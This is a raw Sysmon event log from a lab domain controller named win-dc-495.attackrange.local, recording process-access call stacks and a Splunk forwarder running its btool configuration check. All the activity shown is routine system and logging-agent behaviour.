13:36:32.544{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003415Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.544{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003414Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.544{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003413Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.544{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003412Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.544{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003411Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.544{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003410Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.544{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EE0-6005-A400-00000000A301}2940C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003409Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.544{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003408Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.544{59A5CD1D-8EE0-6005-A300-00000000A301}49564936C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{59A5CD1D-8EE0-6005-A400-00000000A301}2940C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003407Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.550{59A5CD1D-8EE0-6005-A400-00000000A301}2940C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{59A5CD1D-8EE0-6005-A300-00000000A301}4956C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list general --no-log 10341000x80000000000000003406Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.529{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8EE0-6005-A300-00000000A301}4956C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003405Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003404Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003403Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003402Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003401Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003400Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003399Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003398Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003397Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003396Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.529{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EE0-6005-A300-00000000A301}4956C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003395Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.529{59A5CD1D-8EE0-6005-A200-00000000A301}49084924C:\Windows\system32\cmd.exe{59A5CD1D-8EE0-6005-A300-00000000A301}4956C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003394Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.538{59A5CD1D-8EE0-6005-A300-00000000A301}4956C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{59A5CD1D-8EE0-6005-A200-00000000A301}4908C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list general --no-log 10341000x80000000000000003393Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.529{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8EE0-6005-A200-00000000A301}4908C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003392Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003391Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003390Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003389Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 